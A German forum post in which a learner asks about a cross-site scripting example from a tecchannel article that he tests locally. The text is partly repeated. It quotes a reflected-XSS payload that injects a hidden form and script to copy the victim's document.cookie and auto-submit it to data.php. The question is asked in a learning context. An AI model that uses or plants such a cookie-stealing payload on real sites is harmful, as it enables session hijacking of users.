Hallo,
Also ich habe vorhin ein paar ältere Artikel über Cross-Site Scripting gelesen, weil ich darüber in einem Buch gelesen habe.
Jetzt hab ich folgenden Artikel von tecchannel gelesen
http://www.tecchannel.de/server/sich...51/index6.html
Dort wird ein Beispiel gezeigt, die wollte ich dann mal LOKAL auf meiner Maschine testen.
Beim Aufruf der Seite werde ich ja sowieso sofort zu data.php weitergeleitet. Ich verstehe nicht den Sinn des Beispiel wenn es keine Linktarnung gibt?
Gruss Sebastian
Also ich habe vorhin ein paar ältere Artikel über Cross-Site Scripting gelesen, weil ich darüber in einem Buch gelesen habe.
Jetzt hab ich folgenden Artikel von tecchannel gelesen
http://www.tecchannel.de/server/sich...51/index6.html
Dort wird ein Beispiel gezeigt, die wollte ich dann mal LOKAL auf meiner Maschine testen.
PHP-Code:
<a href=xss.php?testing=
<FORM action=data.php method=post name="idForm">
<INPUT name="cookie" type="hidden">
</FORM>
<SCRIPT>
document.idForm.cookie.value=document.cookie;
document.idForm.submit();
</SCRIPT> >
Hier klicken
</a>
Gruss Sebastian
Kommentar